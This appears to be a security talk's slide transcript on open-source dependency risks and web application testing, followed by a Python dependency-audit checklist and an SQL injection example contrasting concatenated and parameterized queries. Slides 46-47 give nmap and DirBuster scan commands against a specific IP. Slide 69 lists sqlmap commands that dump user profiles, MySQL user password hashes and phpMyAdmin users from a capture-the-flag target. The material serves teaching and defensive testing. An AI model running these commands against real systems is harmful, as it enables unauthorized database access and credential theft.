  • 39. Key Questions for each Open Source Library ● Do only 1-2 collaborators exist? Then the chances of unreviewed, harmful code are higher. ● Is code merged to the master branch reviewed through a PR? ● How many issues are OPEN? ● Are the OPEN issues being addressed? ● Is the code maintained or abandoned? ● Are issues getting fixed and released promptly?
  • 40. Key Questions for each Open Source Library ● Check the recently active committers and commits, to understand how old the project is. ● Check how they handle vulnerabilities and security. ● How can you report security vulnerabilities? ● Check open security bugs/issues. ● Good example: Apache Community. https://www.apache.org/security/
  • 43. No known vulnerabilities doesn’t mean SECURITY! 1101 new vulnerabilities were reported in Oct 2019 alone. Source: https://nvd.nist.gov/vuln/full-listing/2019/10
  • 44. Vulnerabilities report - we are getting far worse! Source: https://www.cvedetails.com/browse-by-date.php
  • 46. Check number of OPEN services and ports sudo nmap -p- -sS -A IP-Address
  • 47. Server Files / Directories Scan on permission and Access java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337 httrack website copier
  • 48. Subgraph Vega ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. ● SQL Injection ● XSS ● Inadvertently disclosed sensitive information ● Reflected cross-site scripting ● Stored cross-site scripting ● Blind SQL injection ● Remote file include ● Shell injection ● TLS / SSL security settings
  • 49. Setup Proxy for Vega Tool
  • 50. Setup Proxy for Vega Tool
  • 51. Vega - Start the proxy!
  • 52. Vega - Start scanning Web application
  • 53. Vega - Start scanning Web application
  • 56. Web Application - Tracing web request payload at Proxy
  • 57. Web Application - Tracing web request payload at Proxy
  • 58. Web Application - Intercepting the response callback at Proxy
  • 59. SqlMap - A penetration testing tool for exploiting SQL injection flaws and a lot more! ● Database fingerprinting. ● Full support for SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. ● Dump database tables entirely. ● Out-of-the-box search support for database names, table names, column names and values. ● Support to execute arbitrary commands and retrieve their standard output. ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
  • 60. Demo - Penetration testing a Web Application using SQLMap
  • 61. Demo - Penetration testing a Web Application using SQLMap
  • 62. Demo - Penetration testing a Web Application using SQLMap
  • 63. Demo - Penetration testing a Web Application using SQLMap
  • 64. Demo - Penetration testing a Web Application using SQLMap
  • 65. Demo - Penetration testing a Web Application using SQLMap
  • 66. Demo - Penetration testing a Web Application using SQLMap
  • 67. Demo - Penetration testing a Web Application using SQLMap
  • 68. Demo - Penetration testing a Web Application using SQLMap
  • 69. SQLMap - Commands
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns
      python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump
      https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a8709f33ac5
  • 71. Hope you had a fun!
  • 72. Thank you! Chetan Khatri, [email protected] @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri
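
The "Key Questions for each Open Source Library" on slides 39-40 can be turned into a repeatable check. The sketch below is an added example, not code from the deck: the `RepoFacts` field names, the thresholds and the two sample repositories are assumptions constructed for illustration, and the facts would be filled in by hand or from the project's hosting site.

```python
from dataclasses import dataclass
from datetime import date
from typing import List, Tuple


@dataclass
class RepoFacts:
    """Facts about one dependency (hypothetical field names)."""
    name: str
    contributors: int          # recently active committers
    archived: bool             # project marked archived / abandoned
    last_commit: date
    open_issues: int
    closed_issues: int
    reviewed_merges: int       # merges to master that went through a reviewed PR
    total_merges: int
    has_security_policy: bool  # documented way to report vulnerabilities
    open_security_issues: int


# Illustrative thresholds (assumptions, not values from the slides).
MAX_STALE_DAYS = 365
MAX_OPEN_ISSUE_RATIO = 0.5
MIN_REVIEWED_RATIO = 0.8


def audit(repo: RepoFacts, today: date) -> List[Tuple[str, str]]:
    """Return (code, detail) warnings, one per checklist question that fails."""
    findings: List[Tuple[str, str]] = []
    if repo.archived:
        findings.append(("archived", "project is archived or abandoned"))
    if repo.contributors <= 2:
        findings.append(("few-collaborators",
                         f"{repo.contributors} collaborator(s): code may be unreviewed"))
    stale_days = (today - repo.last_commit).days
    if stale_days > MAX_STALE_DAYS:
        findings.append(("stale", f"last commit {stale_days} days ago"))
    issues = repo.open_issues + repo.closed_issues
    if issues and repo.open_issues / issues > MAX_OPEN_ISSUE_RATIO:
        findings.append(("issue-backlog",
                         f"{repo.open_issues} of {issues} issues still open"))
    # With no merges recorded there is nothing to judge, so the check is skipped.
    if repo.total_merges and repo.reviewed_merges / repo.total_merges < MIN_REVIEWED_RATIO:
        findings.append(("unreviewed-merges",
                         f"{repo.reviewed_merges} of {repo.total_merges} merges reviewed"))
    if not repo.has_security_policy:
        findings.append(("no-security-policy", "no documented way to report vulnerabilities"))
    if repo.open_security_issues > 0:
        findings.append(("open-security-issues",
                         f"{repo.open_security_issues} security issue(s) open"))
    return findings


# Constructed sample data; neither repository is real.
TODAY = date(2019, 10, 18)
STALE_REPO = RepoFacts("abandoned-crypto-lib", 1, True, date(2013, 1, 1),
                       40, 10, 0, 25, False, 3)
HEALTHY_REPO = RepoFacts("well-run-lib", 12, False, date(2019, 10, 10),
                         30, 270, 95, 100, True, 0)

if __name__ == "__main__":
    for repo in (STALE_REPO, HEALTHY_REPO):
        warnings = audit(repo, TODAY)
        print(repo.name, "->", "OK" if not warnings else "")
        for code, detail in warnings:
            print(f"  [{code}] {detail}")
```

An empty result only means none of these warning signs fired; as slide 43 says, no known vulnerabilities does not mean security.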
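
The SQLMap demo on slides 59-69 works because the application's "email" parameter reaches the SQL text itself. The following added example (not part of the deck) shows that flaw beside the parameterized fix. It assumes an in-memory SQLite database as a stand-in for the demo's MySQL; the table and column names come from slide 69, while the rows and the crafted inputs are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the demo database, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_profile (Email TEXT, Mobile TEXT, Name TEXT)")
    conn.executemany(
        "INSERT INTO user_profile VALUES (?, ?, ?)",
        [("alice@example.com", "555-0100", "Alice"),
         ("bob@example.com", "555-0101", "Bob")],
    )
    return conn


def lookup_concatenated(conn, email):
    """Vulnerable: the input becomes part of the SQL statement."""
    query = "SELECT Name FROM user_profile WHERE Email = '" + email + "'"
    return sorted(row[0] for row in conn.execute(query))


def lookup_parameterized(conn, email):
    """Hardened: the input is bound as data and never parsed as SQL."""
    query = "SELECT Name FROM user_profile WHERE Email = ?"
    return sorted(row[0] for row in conn.execute(query, (email,)))


# Constructed inputs: a tautology and an address containing an apostrophe.
TAUTOLOGY = "nobody@example.com' OR '1'='1"
APOSTROPHE = "o'brien@example.com"


def compare(conn):
    """Run both lookups over the same inputs and collect what each returns."""
    results = {}
    for label, value in (("normal", "alice@example.com"),
                         ("tautology", TAUTOLOGY),
                         ("apostrophe", APOSTROPHE)):
        try:
            unsafe = lookup_concatenated(conn, value)
        except sqlite3.OperationalError:
            # A stray quote breaks the statement; error messages like this
            # are the signal that error-based techniques rely on.
            unsafe = "syntax error"
        results[label] = (unsafe, lookup_parameterized(conn, value))
    return results


if __name__ == "__main__":
    for label, (unsafe, safe) in compare(make_db()).items():
        print(f"{label:10} concatenated={unsafe!r} parameterized={safe!r}")
```

The concatenated lookup returns every row for the tautology and fails outright on a legitimate apostrophe, while the parameterized lookup treats both as ordinary strings that match nothing.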